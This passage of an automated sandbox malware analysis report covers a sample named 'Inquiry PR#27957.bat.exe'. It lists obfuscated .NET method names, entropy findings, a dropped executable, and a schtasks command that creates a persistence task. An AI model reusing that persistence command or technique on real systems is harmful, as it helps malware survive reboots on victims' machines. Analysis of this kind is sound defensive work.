            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010D1368 push eax; iretd 14_2_010D1369
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_010D1FEC push eax; iretd 14_2_010D1FED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01157E99 push ecx; ret 14_2_01157EAC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E543C2 pushfd ; ret 16_2_03E543C3
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E55399 push ecx; iretd 16_2_03E5539F
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exeCode function: 16_2_03E4B39B push 00000025h; iretd 16_2_03E4B457
            Source: Inquiry PR#27957.bat.exeStatic PE information: section name: .text entropy: 7.729262994799031
            Source: fuqwoDzun.exe.0.drStatic PE information: section name: .text entropy: 7.729262994799031
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, Qv6nKVkMrw0PH54Rlk.csHigh entropy of concatenated method names: 'KpcVugxKbx', 'oXCVjLveUw', 'Gu6Vp9sILu', 'e0pVQfBbeH', 'voEVHVVVrl', 'gk4V2TmTID', 'ARQV9as2NU', 'ivPVKpPDkM', 'X4PVTdfoww', 'XWkV7pN3uY'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, E7cOsiJ5FJYfBJrtfh.csHigh entropy of concatenated method names: 'WD6V61IceB', 'VYgVZoUvqt', 'QIvVbGgFtQ', 'jrhbDt8fLr', 'X1bbzVP55T', 'VACVdifEMp', 'BlqVixqAUA', 'CRaVt0ivpF', 'aIpVWCgdX4', 'ayEVAjc6At'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, YrveFaqHXLxJ3nLH7a.csHigh entropy of concatenated method names: 'PFBp5hZKp', 'D8JQsEOr5', 'yBS2671an', 'FSg9XgxBN', 't6YTb9b5o', 'pq27AivsB', 'tIm94P3jgl7Uw048NG', 'fITJxi9VmKWUxQKOFY', 'Cm4Ifs5Pw', 'xQdRE6vlu'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, QwyVXl69uQASqvDSPL1.csHigh entropy of concatenated method names: 'oWf0ux3hTy', 'GQb0j8mpRg', 'twi0pC49J6', 'fG50QQHaGS', 'YK90HhDut8', 'KAY024VQ7B', 'b8n09BTvht', 'gch0KUGdkH', 'WfQ0TrnaWl', 'vho073BNHn'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, cxQV3w6S9O5x2FnXUAn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dcnRqSsxna', 'kgyRMaqZ7k', 'sA6RomV12O', 'seIRkkaWG9', 'a3TRm8Mkyn', 'gx8RxiD35n', 'VSjRv2e1xD'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, SYmI45AmVSdHQuptDI.csHigh entropy of concatenated method names: 'fdPGJVBVbZ', 'jiUGfL8BSY', 'LpYGqCTQlL', 'LBxGM4wh8B', 'EJGG1fIRTO', 'fOcGl78I6r', 'xY3GLVZfaq', 'ClIGOhy55M', 'nUAGg33Zkc', 'TkyGYub174'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, FdDnt7PB3Tv3M2q4yi.csHigh entropy of concatenated method names: 'WfkiVP4Jge', 'oZHiX7EaBT', 'KwAi8SDkJv', 'P9tiNSGK1x', 'XjqiGkh7uL', 'N6Gi50d2Fy', 'w0F8YczxjcXtQNWkUg', 'uBkv9lqloGwsjo1MP8j', 'SZJiiX9CsX', 'OIviWUwKdG'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, R7l61W7Y4qgSklHn9m.csHigh entropy of concatenated method names: 'J9LZQKeMx0', 'ykFZ2LH8PV', 'WOvZKrL5O6', 'xRMZTCV0xn', 'gLaZGgK5Ua', 'Oj1Z5RkMRD', 'IDCZ3xHn0O', 'dA0ZIIEAIY', 'cHIZ0oWkWB', 'th3ZRWfyH8'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, r3Q1SYRNwEfwp9YRQp.csHigh entropy of concatenated method names: 'cOhWBZU1nM', 'thJW6M7Zry', 'TCKWcG2tlC', 'xGuWZ0XSvu', 'iPxWPnL32u', 'G0bWbseYVy', 't4MWVprckM', 'D28WXvWCpZ', 'GEsWyF2W8a', 'nQFW89mojk'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, A48FpKzWG2N1S4F0iV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QEk04fOwQm', 'tUJ0GCO9ul', 'GQL057o6tX', 'gbZ03pQyZY', 'BSr0ICbsFQ', 'ia100SuCeX', 'uSC0RIe59V'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, oywN7H2nk0EgtXT8BS.csHigh entropy of concatenated method names: 'crR3wexPE8', 'kAI3D4vprv', 'XyqIdtIrMH', 'fhIIive65h', 'zsY3a3DIpK', 'zyi3fN3E3P', 'LpC3e2WUkK', 'OvD3q9jpp3', 'WJ83MTQTfE', 'jnP3oFEl7I'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, QyCCYl8mpv3brNI45u.csHigh entropy of concatenated method names: 'Dispose', 'vu4ihK5lqN', 'Lolt15Q8ZU', 'GfkSSLiWuK', 'vjmiD02Xm0', 'GGmizTcHdA', 'ProcessDialogKey', 'TajtdEIXPV', 'KI5tiMkdWr', 'K08ttnc1dS'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, VPrUvSfspKnJabrj3o.csHigh entropy of concatenated method names: 'YHlbBctKa3', 'nZcbcjkdif', 'JNEbP2WiON', 'nuZbVbj6om', 'z79bXYfCAK', 'j0sPmZ8c1r', 'CEIPxaCmqJ', 'vjvPv9SDh3', 'b8uPwlkVls', 'HKxPhj4OgU'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, F5jrSH1cjhF6BXAvsS.csHigh entropy of concatenated method names: 'uwLPHA8OQM', 'SntP9ggPVF', 'DjfZlvQ00T', 'ITvZLddUqj', 'fe2ZOCfcXH', 'Jb4Zg4dqe3', 'gTHZYnSYY6', 'H8CZUFFl7i', 'K3kZE8oAhM', 'fELZJh1sNO'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, MWAaqsCjcPmuK8pvZQ.csHigh entropy of concatenated method names: 'VYyIFKKLoc', 'E2gI1MUWIK', 'iI0IlNMXWI', 'zymIL3sLVS', 'MefIq0BkDQ', 'ScIIOs0jXj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, b9060lgXpIuMEFTtMf.csHigh entropy of concatenated method names: 'LZrcqFejME', 'VR8cMHQbf5', 'MCccoXwTGu', 'gxsckCdFcn', 'M3JcmA3qAb', 'IQlcxoFJwI', 'qN4cvyVOR3', 'VCUcw9tynr', 'f4Uch0vHqS', 'X1ZcDVFB3e'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, gPoWFxhx262UMoc7vh.csHigh entropy of concatenated method names: 'QwibC6E5MF', 'znSbuCQ9u8', 'Lk3bp8yq23', 's4YbQWIdnU', 'UBPb2rQIXZ', 'muKb9wRFlj', 'r3XbTt2E2m', 'GaUb7dyBe1', 'obw49p5ncWwy07BfqTO', 'd0ql2U50OwIV3ITGnt8'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, qxWLsh0o1oZb7o8vhC.csHigh entropy of concatenated method names: 'JprI6prXOl', 'lMXIcY8irO', 'H4jIZC4HRQ', 'LHMIPFU9AJ', 'idjIbX2i3v', 'fqHIVQWTd3', 'BUEIXTb88a', 'wpBIykQ4yh', 'nRfI8ooUQ8', 'SVKIN7lUUu'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, uUHGUwQ8UxCOAsbsCR.csHigh entropy of concatenated method names: 'zhU4KDdxOY', 'QAF4TPN6EO', 'kFx4FVnnfp', 'VpX41PR3iT', 'Nsf4LTOhIU', 'NTu4OgncMM', 'TEe4Yg4Tvo', 'yoM4UMeYw3', 'SB74Jkn6jq', 'Tt44avrLMT'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, VFJ7f6mhMZvHGAEqjh.csHigh entropy of concatenated method names: 'wPO38coWce', 'BQa3NkCeiC', 'ToString', 'bOV36lxBtb', 'hUm3ciI99g', 'OOW3ZeO0HR', 'mZJ3P73tg4', 'YOs3bxphbk', 'p063V5abgs', 'ffq3XdNGZj'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, mDomuj3kbVoYZcXPk7.csHigh entropy of concatenated method names: 'tTa0it1pnn', 'mJZ0WsOdX2', 'PAH0ABdFLw', 'M3W06IWo4p', 'dhI0c0I9UF', 'FrR0Pp7t0w', 'd4s0bavID1', 'DwiIvw9un3', 'Di0IwXDIUO', 'B8RIh5jBc6'
            Source: 0.2.Inquiry PR#27957.bat.exe.42a0560.3.raw.unpack, xbiPAnwtp187E2yj75.csHigh entropy of concatenated method names: 'ToString', 'mVs5aBPEo2', 'rEM51GTygT', 'qev5lyNvWb', 'MXP5LtcKLU', 'SBd5Os0Dml', 'Dwt5gSugOv', 'bee5YSFoUx', 'xy35UGHha2', 'q9i5E5Em1C'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, Qv6nKVkMrw0PH54Rlk.csHigh entropy of concatenated method names: 'KpcVugxKbx', 'oXCVjLveUw', 'Gu6Vp9sILu', 'e0pVQfBbeH', 'voEVHVVVrl', 'gk4V2TmTID', 'ARQV9as2NU', 'ivPVKpPDkM', 'X4PVTdfoww', 'XWkV7pN3uY'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, E7cOsiJ5FJYfBJrtfh.csHigh entropy of concatenated method names: 'WD6V61IceB', 'VYgVZoUvqt', 'QIvVbGgFtQ', 'jrhbDt8fLr', 'X1bbzVP55T', 'VACVdifEMp', 'BlqVixqAUA', 'CRaVt0ivpF', 'aIpVWCgdX4', 'ayEVAjc6At'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, YrveFaqHXLxJ3nLH7a.csHigh entropy of concatenated method names: 'PFBp5hZKp', 'D8JQsEOr5', 'yBS2671an', 'FSg9XgxBN', 't6YTb9b5o', 'pq27AivsB', 'tIm94P3jgl7Uw048NG', 'fITJxi9VmKWUxQKOFY', 'Cm4Ifs5Pw', 'xQdRE6vlu'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, QwyVXl69uQASqvDSPL1.csHigh entropy of concatenated method names: 'oWf0ux3hTy', 'GQb0j8mpRg', 'twi0pC49J6', 'fG50QQHaGS', 'YK90HhDut8', 'KAY024VQ7B', 'b8n09BTvht', 'gch0KUGdkH', 'WfQ0TrnaWl', 'vho073BNHn'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, cxQV3w6S9O5x2FnXUAn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dcnRqSsxna', 'kgyRMaqZ7k', 'sA6RomV12O', 'seIRkkaWG9', 'a3TRm8Mkyn', 'gx8RxiD35n', 'VSjRv2e1xD'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, SYmI45AmVSdHQuptDI.csHigh entropy of concatenated method names: 'fdPGJVBVbZ', 'jiUGfL8BSY', 'LpYGqCTQlL', 'LBxGM4wh8B', 'EJGG1fIRTO', 'fOcGl78I6r', 'xY3GLVZfaq', 'ClIGOhy55M', 'nUAGg33Zkc', 'TkyGYub174'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, FdDnt7PB3Tv3M2q4yi.csHigh entropy of concatenated method names: 'WfkiVP4Jge', 'oZHiX7EaBT', 'KwAi8SDkJv', 'P9tiNSGK1x', 'XjqiGkh7uL', 'N6Gi50d2Fy', 'w0F8YczxjcXtQNWkUg', 'uBkv9lqloGwsjo1MP8j', 'SZJiiX9CsX', 'OIviWUwKdG'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, R7l61W7Y4qgSklHn9m.csHigh entropy of concatenated method names: 'J9LZQKeMx0', 'ykFZ2LH8PV', 'WOvZKrL5O6', 'xRMZTCV0xn', 'gLaZGgK5Ua', 'Oj1Z5RkMRD', 'IDCZ3xHn0O', 'dA0ZIIEAIY', 'cHIZ0oWkWB', 'th3ZRWfyH8'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, r3Q1SYRNwEfwp9YRQp.csHigh entropy of concatenated method names: 'cOhWBZU1nM', 'thJW6M7Zry', 'TCKWcG2tlC', 'xGuWZ0XSvu', 'iPxWPnL32u', 'G0bWbseYVy', 't4MWVprckM', 'D28WXvWCpZ', 'GEsWyF2W8a', 'nQFW89mojk'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, A48FpKzWG2N1S4F0iV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QEk04fOwQm', 'tUJ0GCO9ul', 'GQL057o6tX', 'gbZ03pQyZY', 'BSr0ICbsFQ', 'ia100SuCeX', 'uSC0RIe59V'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, oywN7H2nk0EgtXT8BS.csHigh entropy of concatenated method names: 'crR3wexPE8', 'kAI3D4vprv', 'XyqIdtIrMH', 'fhIIive65h', 'zsY3a3DIpK', 'zyi3fN3E3P', 'LpC3e2WUkK', 'OvD3q9jpp3', 'WJ83MTQTfE', 'jnP3oFEl7I'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, QyCCYl8mpv3brNI45u.csHigh entropy of concatenated method names: 'Dispose', 'vu4ihK5lqN', 'Lolt15Q8ZU', 'GfkSSLiWuK', 'vjmiD02Xm0', 'GGmizTcHdA', 'ProcessDialogKey', 'TajtdEIXPV', 'KI5tiMkdWr', 'K08ttnc1dS'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, VPrUvSfspKnJabrj3o.csHigh entropy of concatenated method names: 'YHlbBctKa3', 'nZcbcjkdif', 'JNEbP2WiON', 'nuZbVbj6om', 'z79bXYfCAK', 'j0sPmZ8c1r', 'CEIPxaCmqJ', 'vjvPv9SDh3', 'b8uPwlkVls', 'HKxPhj4OgU'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, F5jrSH1cjhF6BXAvsS.csHigh entropy of concatenated method names: 'uwLPHA8OQM', 'SntP9ggPVF', 'DjfZlvQ00T', 'ITvZLddUqj', 'fe2ZOCfcXH', 'Jb4Zg4dqe3', 'gTHZYnSYY6', 'H8CZUFFl7i', 'K3kZE8oAhM', 'fELZJh1sNO'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, MWAaqsCjcPmuK8pvZQ.csHigh entropy of concatenated method names: 'VYyIFKKLoc', 'E2gI1MUWIK', 'iI0IlNMXWI', 'zymIL3sLVS', 'MefIq0BkDQ', 'ScIIOs0jXj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, b9060lgXpIuMEFTtMf.csHigh entropy of concatenated method names: 'LZrcqFejME', 'VR8cMHQbf5', 'MCccoXwTGu', 'gxsckCdFcn', 'M3JcmA3qAb', 'IQlcxoFJwI', 'qN4cvyVOR3', 'VCUcw9tynr', 'f4Uch0vHqS', 'X1ZcDVFB3e'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, gPoWFxhx262UMoc7vh.csHigh entropy of concatenated method names: 'QwibC6E5MF', 'znSbuCQ9u8', 'Lk3bp8yq23', 's4YbQWIdnU', 'UBPb2rQIXZ', 'muKb9wRFlj', 'r3XbTt2E2m', 'GaUb7dyBe1', 'obw49p5ncWwy07BfqTO', 'd0ql2U50OwIV3ITGnt8'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, qxWLsh0o1oZb7o8vhC.csHigh entropy of concatenated method names: 'JprI6prXOl', 'lMXIcY8irO', 'H4jIZC4HRQ', 'LHMIPFU9AJ', 'idjIbX2i3v', 'fqHIVQWTd3', 'BUEIXTb88a', 'wpBIykQ4yh', 'nRfI8ooUQ8', 'SVKIN7lUUu'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, uUHGUwQ8UxCOAsbsCR.csHigh entropy of concatenated method names: 'zhU4KDdxOY', 'QAF4TPN6EO', 'kFx4FVnnfp', 'VpX41PR3iT', 'Nsf4LTOhIU', 'NTu4OgncMM', 'TEe4Yg4Tvo', 'yoM4UMeYw3', 'SB74Jkn6jq', 'Tt44avrLMT'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, VFJ7f6mhMZvHGAEqjh.csHigh entropy of concatenated method names: 'wPO38coWce', 'BQa3NkCeiC', 'ToString', 'bOV36lxBtb', 'hUm3ciI99g', 'OOW3ZeO0HR', 'mZJ3P73tg4', 'YOs3bxphbk', 'p063V5abgs', 'ffq3XdNGZj'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, mDomuj3kbVoYZcXPk7.csHigh entropy of concatenated method names: 'tTa0it1pnn', 'mJZ0WsOdX2', 'PAH0ABdFLw', 'M3W06IWo4p', 'dhI0c0I9UF', 'FrR0Pp7t0w', 'd4s0bavID1', 'DwiIvw9un3', 'Di0IwXDIUO', 'B8RIh5jBc6'
            Source: 0.2.Inquiry PR#27957.bat.exe.7290000.7.raw.unpack, xbiPAnwtp187E2yj75.csHigh entropy of concatenated method names: 'ToString', 'mVs5aBPEo2', 'rEM51GTygT', 'qev5lyNvWb', 'MXP5LtcKLU', 'SBd5Os0Dml', 'Dwt5gSugOv', 'bee5YSFoUx', 'xy35UGHha2', 'q9i5E5Em1C'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, Qv6nKVkMrw0PH54Rlk.csHigh entropy of concatenated method names: 'KpcVugxKbx', 'oXCVjLveUw', 'Gu6Vp9sILu', 'e0pVQfBbeH', 'voEVHVVVrl', 'gk4V2TmTID', 'ARQV9as2NU', 'ivPVKpPDkM', 'X4PVTdfoww', 'XWkV7pN3uY'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, E7cOsiJ5FJYfBJrtfh.csHigh entropy of concatenated method names: 'WD6V61IceB', 'VYgVZoUvqt', 'QIvVbGgFtQ', 'jrhbDt8fLr', 'X1bbzVP55T', 'VACVdifEMp', 'BlqVixqAUA', 'CRaVt0ivpF', 'aIpVWCgdX4', 'ayEVAjc6At'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, YrveFaqHXLxJ3nLH7a.csHigh entropy of concatenated method names: 'PFBp5hZKp', 'D8JQsEOr5', 'yBS2671an', 'FSg9XgxBN', 't6YTb9b5o', 'pq27AivsB', 'tIm94P3jgl7Uw048NG', 'fITJxi9VmKWUxQKOFY', 'Cm4Ifs5Pw', 'xQdRE6vlu'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, QwyVXl69uQASqvDSPL1.csHigh entropy of concatenated method names: 'oWf0ux3hTy', 'GQb0j8mpRg', 'twi0pC49J6', 'fG50QQHaGS', 'YK90HhDut8', 'KAY024VQ7B', 'b8n09BTvht', 'gch0KUGdkH', 'WfQ0TrnaWl', 'vho073BNHn'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, cxQV3w6S9O5x2FnXUAn.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dcnRqSsxna', 'kgyRMaqZ7k', 'sA6RomV12O', 'seIRkkaWG9', 'a3TRm8Mkyn', 'gx8RxiD35n', 'VSjRv2e1xD'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, SYmI45AmVSdHQuptDI.csHigh entropy of concatenated method names: 'fdPGJVBVbZ', 'jiUGfL8BSY', 'LpYGqCTQlL', 'LBxGM4wh8B', 'EJGG1fIRTO', 'fOcGl78I6r', 'xY3GLVZfaq', 'ClIGOhy55M', 'nUAGg33Zkc', 'TkyGYub174'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, FdDnt7PB3Tv3M2q4yi.csHigh entropy of concatenated method names: 'WfkiVP4Jge', 'oZHiX7EaBT', 'KwAi8SDkJv', 'P9tiNSGK1x', 'XjqiGkh7uL', 'N6Gi50d2Fy', 'w0F8YczxjcXtQNWkUg', 'uBkv9lqloGwsjo1MP8j', 'SZJiiX9CsX', 'OIviWUwKdG'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, R7l61W7Y4qgSklHn9m.csHigh entropy of concatenated method names: 'J9LZQKeMx0', 'ykFZ2LH8PV', 'WOvZKrL5O6', 'xRMZTCV0xn', 'gLaZGgK5Ua', 'Oj1Z5RkMRD', 'IDCZ3xHn0O', 'dA0ZIIEAIY', 'cHIZ0oWkWB', 'th3ZRWfyH8'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, r3Q1SYRNwEfwp9YRQp.csHigh entropy of concatenated method names: 'cOhWBZU1nM', 'thJW6M7Zry', 'TCKWcG2tlC', 'xGuWZ0XSvu', 'iPxWPnL32u', 'G0bWbseYVy', 't4MWVprckM', 'D28WXvWCpZ', 'GEsWyF2W8a', 'nQFW89mojk'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, A48FpKzWG2N1S4F0iV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QEk04fOwQm', 'tUJ0GCO9ul', 'GQL057o6tX', 'gbZ03pQyZY', 'BSr0ICbsFQ', 'ia100SuCeX', 'uSC0RIe59V'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, oywN7H2nk0EgtXT8BS.csHigh entropy of concatenated method names: 'crR3wexPE8', 'kAI3D4vprv', 'XyqIdtIrMH', 'fhIIive65h', 'zsY3a3DIpK', 'zyi3fN3E3P', 'LpC3e2WUkK', 'OvD3q9jpp3', 'WJ83MTQTfE', 'jnP3oFEl7I'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, QyCCYl8mpv3brNI45u.csHigh entropy of concatenated method names: 'Dispose', 'vu4ihK5lqN', 'Lolt15Q8ZU', 'GfkSSLiWuK', 'vjmiD02Xm0', 'GGmizTcHdA', 'ProcessDialogKey', 'TajtdEIXPV', 'KI5tiMkdWr', 'K08ttnc1dS'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, VPrUvSfspKnJabrj3o.csHigh entropy of concatenated method names: 'YHlbBctKa3', 'nZcbcjkdif', 'JNEbP2WiON', 'nuZbVbj6om', 'z79bXYfCAK', 'j0sPmZ8c1r', 'CEIPxaCmqJ', 'vjvPv9SDh3', 'b8uPwlkVls', 'HKxPhj4OgU'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, F5jrSH1cjhF6BXAvsS.csHigh entropy of concatenated method names: 'uwLPHA8OQM', 'SntP9ggPVF', 'DjfZlvQ00T', 'ITvZLddUqj', 'fe2ZOCfcXH', 'Jb4Zg4dqe3', 'gTHZYnSYY6', 'H8CZUFFl7i', 'K3kZE8oAhM', 'fELZJh1sNO'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, MWAaqsCjcPmuK8pvZQ.csHigh entropy of concatenated method names: 'VYyIFKKLoc', 'E2gI1MUWIK', 'iI0IlNMXWI', 'zymIL3sLVS', 'MefIq0BkDQ', 'ScIIOs0jXj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, b9060lgXpIuMEFTtMf.csHigh entropy of concatenated method names: 'LZrcqFejME', 'VR8cMHQbf5', 'MCccoXwTGu', 'gxsckCdFcn', 'M3JcmA3qAb', 'IQlcxoFJwI', 'qN4cvyVOR3', 'VCUcw9tynr', 'f4Uch0vHqS', 'X1ZcDVFB3e'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, gPoWFxhx262UMoc7vh.csHigh entropy of concatenated method names: 'QwibC6E5MF', 'znSbuCQ9u8', 'Lk3bp8yq23', 's4YbQWIdnU', 'UBPb2rQIXZ', 'muKb9wRFlj', 'r3XbTt2E2m', 'GaUb7dyBe1', 'obw49p5ncWwy07BfqTO', 'd0ql2U50OwIV3ITGnt8'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, qxWLsh0o1oZb7o8vhC.csHigh entropy of concatenated method names: 'JprI6prXOl', 'lMXIcY8irO', 'H4jIZC4HRQ', 'LHMIPFU9AJ', 'idjIbX2i3v', 'fqHIVQWTd3', 'BUEIXTb88a', 'wpBIykQ4yh', 'nRfI8ooUQ8', 'SVKIN7lUUu'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, uUHGUwQ8UxCOAsbsCR.csHigh entropy of concatenated method names: 'zhU4KDdxOY', 'QAF4TPN6EO', 'kFx4FVnnfp', 'VpX41PR3iT', 'Nsf4LTOhIU', 'NTu4OgncMM', 'TEe4Yg4Tvo', 'yoM4UMeYw3', 'SB74Jkn6jq', 'Tt44avrLMT'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, VFJ7f6mhMZvHGAEqjh.csHigh entropy of concatenated method names: 'wPO38coWce', 'BQa3NkCeiC', 'ToString', 'bOV36lxBtb', 'hUm3ciI99g', 'OOW3ZeO0HR', 'mZJ3P73tg4', 'YOs3bxphbk', 'p063V5abgs', 'ffq3XdNGZj'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, mDomuj3kbVoYZcXPk7.csHigh entropy of concatenated method names: 'tTa0it1pnn', 'mJZ0WsOdX2', 'PAH0ABdFLw', 'M3W06IWo4p', 'dhI0c0I9UF', 'FrR0Pp7t0w', 'd4s0bavID1', 'DwiIvw9un3', 'Di0IwXDIUO', 'B8RIh5jBc6'
            Source: 0.2.Inquiry PR#27957.bat.exe.4327d80.2.raw.unpack, xbiPAnwtp187E2yj75.csHigh entropy of concatenated method names: 'ToString', 'mVs5aBPEo2', 'rEM51GTygT', 'qev5lyNvWb', 'MXP5LtcKLU', 'SBd5Os0Dml', 'Dwt5gSugOv', 'bee5YSFoUx', 'xy35UGHha2', 'q9i5E5Em1C'
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeFile created: C:\Users\user\AppData\Roaming\fuqwoDzun.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
